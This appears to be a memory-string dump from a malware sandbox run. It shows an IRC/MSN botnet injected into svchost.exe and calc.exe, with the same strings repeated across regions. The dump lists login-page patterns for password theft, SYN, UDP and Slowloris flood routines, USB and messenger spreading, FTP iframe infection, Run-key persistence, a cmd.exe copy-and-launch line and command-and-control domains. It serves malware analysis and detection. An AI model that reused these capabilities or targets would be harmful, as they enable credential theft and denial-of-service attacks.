iconÊnnot change the size of a WIC Image$Unknown picture file extension (.%s)Unsupported clipboard formatCanvas does not allow drawing#Text format flag '%s' not supportedWindows Server 2003Windows Server 2003 R2Windows Server 2012Windows 8Error writing zip file"Invalid Zip Local Header signature$Invalid Zip Central Header signature1Support for compression method not registered: %sObserver is not supportedLCannot have multiple single cast observers added to the observers collection4The object does not implement the observer interface5Insufficient RTTI available to support this operationParameter count mismatch WindowsWindows VistaWindows Server 2008Windows 7Windows Server 2008 R2Windows 2000Windows XPTimespan too longbThe duration cannot be returned because the absolute value exceeds the value of TTimeSpan.MaxValueNo help found for context %dNo help found for %sParameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %dThe specified path is too long The specified path was not found The path format is not supportedThe drive cannot be found The specified file was not foundWThe given "%s" local time is invalid (situated within the missing period prior to DST).$No help viewer that supports filtersInvalid Timeout value: %sFailed to create key %sFailed to get data for '%s'Failed to set data for '%s'Resource %s not found%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration groupProperty %s does not existThread creation error: %sThread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created threadUnable to write to %sInvalid file name - %s'%s' is an invalid mask at (%d)$''%s'' is not a valid component nameInvalid data type for '%s' List capacity out of bounds (%d)List count out of bounds (%d)List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM classError reading %s%s%s: %sInvalid count (%d)Invalid destination index (%d)Ancestor for '%s' not foundCannot assign a %s to a %sBits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main threadClass %s not foundA class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicatesCannot create file "%s". %sCannot open file "%s". %sInvalid destination array"Character index out of bounds (%d)Start index out of bounds (%d)%s (%s, line %d)Abstract Error?Access violation at address %p in module '%s'. %s of address %pSystem Error. Code: %d.2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)Operation not supportedExternal exception %xInterface not supportedObject lock not owned(Monitor support function not initializedApplication Error1Format '%s' invalid or incompatible with argumentNo argument for format '%s'"Variant method calls not supportedInvalid variant operationInvalid NULL variant operation%Invalid variant operation (%s%.8x)%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usableInteger overflow Invalid floating point operationInvalid pointer operationInvalid class typecast0Access violation at address %p. %s of address %pPrivileged instruction(Exception %s in module %s at %p.!'%s' is not a valid integer value('%s' is not a valid floating point value '%s' is not a valid date'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp'%s' is not a valid GUID valueI/O error %dsvchost.exe_884_rwx_00170000_0004E000:
.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhttp://%s/%shttp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)http://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Run\\.\%c:*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dllm1xg.orgmxxtxxt.bizmeob.me]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhttp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\c1419a97%System%\svchost.exe%WinDir%%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe7 767<7~78*808;8~8%s\Identities\%s.exe\\.\pipeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\winlogon.exenotepad.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\WINDOWS\system32\svchost.exeC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exesvchost.exe_884_rwx_00A10000_00029000:
.text`.data.rsrc@.reloc*windows defender**windowsupdate**drweb*dwwin.exekernel32.dlliphlpapi.dllGetExtendedTcpTableGetOwnerModuleFromTcpEntry%systemroot%%programfiles%\Common Files\*\*.exe%appdata%\Identities\*.exe%root%\RECYCLER\S-1-5-21-0243556031-888888379-*\*.exeole32.dll/c "%%SystemRoot%%\explorer.exe %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"/c "start %Í%%%s & attrib -s -h %Í%%%s & xcopy /F /S /Q /H /R /Y %Í%%%s %%temp%%\%s\ & attrib s h %Í%%%s & start %%temp%%\%s\%s & exit"%ALLUSERSPROFILE%\..\..\windows\system32\cmd.exe%SystemRoot%\system32\SHELL32.dll%s\c731200%s\%s%s\%s.lnkWindows_Shared_Mutex_231_c000100ntdll.dll\ScreenSaverPro.scr\temp.binuser32.dlladvapi32.dllshell32.dllurlmon.dllwininet.dllgdi32.dllrpcrt4.dllnetapi32.dll*.exe.gonewiththewings*.gonewiththewingsWinExecURLDownloadToFileAhttp://www.google.com\calc.exe\Reader_sl.exeSOFTWARE\Microsoft\Windows\CurrentVersion\Runnotepad.exe\notepad.exe\svchost.exeWindowsIdIdentities\%s%s\%s\%s.exe:Zone.Identifier.quarantined"%s" -shell"%s" -binduserinit.exeexplorer.exeWindows critical error, require rebootWindows UpdateSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\SystemGetProcessHeapGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegOpenKeyARegEnumKeyARegCreateKeyExARegOpenKeyExAADVAPI32.dllShellExecuteExWSHELL32.dllSetTcpEntrySHLWAPI.dllRPCRT4.dllNETAPI32.dllDNSAPI.dllSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonSoftware\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunSoftware\WindowsId Manager ReaderSoftware\Microsoft\Windows\CurrentVersion\Policies\ExplorerSoftware\Microsoft\Windows\CurrentVersion\RunSoftware\Microsoft\Windows\CurrentVersion\RunOnceWindowsMarkm1xg.orgmxxtxxt.bizmeob.me%System%\notepad.exe`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0A%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%s%s_%d-%sMutex%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0httpidnsapi.dllhttp://%s/%shttp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)http://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/s\\.\%c:*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWURLDownloadToFileWHttpSendRequestWHttpSendRequestANtEnumerateValueKeySecur32.dllShellExecuteAHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllWS2_32.dllMSVCRT.dllConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWRegNotifyChangeKeyValuePASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhttp://api.wipmania.com/\\.\pipe\x_ipc7 767<7~78*808;8~8{A5DCBF10-6530-11D2-901F-00C04FB951ED}shlwapi.dllcrypt32.dllwtsapi32.dllsamcli.dllnetutils.dlluserenv.dllWindowsSecondaryDesktop\charmap.exe\Windows Media Player\wmprph.exeC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe%s\Identities\%s.exe\\.\pipeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifiersecur32.dllws2_32.dll:%S%S\winlogon.exeAadvapi32.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Runcalc.exe_1160:
.text`.data.rsrcSHELL32.dllmsvcrt.dllADVAPI32.dllKERNEL32.dllGDI32.dllUSER32.dllhhctrl.ocxCLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32calc.pdbj.OXO_acmdlnRegCloseKeyRegOpenKeyExAname="Microsoft.Windows.Shell.calc"version="5.1.0.0"Windows Shell name="Microsoft.Windows.Common-Controls"version="6.0.0.0"publicKeyToken="6595b64144ccf1df"CalcMsgPumpWndThe requested operation may take a very long time to complete.Do you want to let the calculation continue, or stop the operation now?Windows Calculator application file5.1.2600.0 (xpclient.010817-1148)CALC.EXEWindowsOperating System5.1.2600.0Operation was canceled.-Calc does not have enough memory to continue.eThe requested function may take a very long time to complete.Do you want to abort the operation now?calc.hlpCannot open Clipboard.TThere is not enough memory for data.calc.chmcalc.exe_1160_rwx_000A0000_00002000:
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\458757875a1ox0.exewjjza.exetj07a.exewd6ql.exe6tr3f.exeuc4de.exeuzue6.exetzm0b.exexkp0h.exem5h8j.exesbt6e.exe1sq28.exepla6o.exe26y6n.exez6dea.exe2ld02.exem55uw.exe5x8mu.exe640ha.exeuser32.dllurlmon.dllURLDownloadToFileAwininet.dllhttp://www.google.comnotepad.exe_1520:
.text`.data.rsrccomdlg32.dllSHELL32.dllWINSPOOL.DRVCOMCTL32.dllmsvcrt.dllADVAPI32.dllKERNEL32.dllNTDLL.DLLGDI32.dllUSER32.dllnotepad.chmhhctrl.ocxCLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32notepad.pdbt%SSh_acmdlnRegCloseKeyRegCreateKeyWRegOpenKeyExASetViewportExtExGetKeyboardLayoutname="Microsoft.Windows.Shell.notepad"version="5.1.0.0"Windows Shell name="Microsoft.Windows.Common-Controls"version="6.0.0.0"publicKeyToken="6595b64144ccf1df"&*$#$$#$*MMMrMMM`MMMRMMMFMMM:MMM.MMM"MMM*.txt/.SETUP5.1.2600.5512 (xpsp.080413-2105)NOTEPAD.EXEWindowsOperating System5.1.2600.5512notepad.hlpText Documents (*.txt)You cannot quit Windows because the Save As dialogdialog box, and then try quitting Windows again.Common Dialog error (0xx)Not enough memory available to complete this operation. Quit one or more applications to increase available memory, and then try again.KThe %% file is too large for Notepad.Not a valid file name.MCannot create the %% file.Make sure that the path and filename are correct.RCannot carry out the Word Wrap command because there is too much text in the file.Page %dLn %d, Col %dcalc.exe_1160_rwx_00970000_0004E000:
.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhttp://%s/%shttp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)http://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Run\\.\%c:*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dllm1xg.orgmxxtxxt.bizmeob.me]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhttp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\c1419a97%System%\calc.exe%WinDir%%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe7 767<7~78*808;8~8%s\Identities\%s.exe\\.\pipeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\winlogon.exenotepad.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\WINDOWS\system32\calc.exeC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.execalc.exe_1160_rwx_00A00000_00027000:
.text`.rdata@.data.rsrc@.relocPSSSSSShPSSVSShRPVSShPSSh(PSSh#PSSh'PSSh&PSSh*9p.uVcalc.exe_1160_rwx_00A28000_00072000:
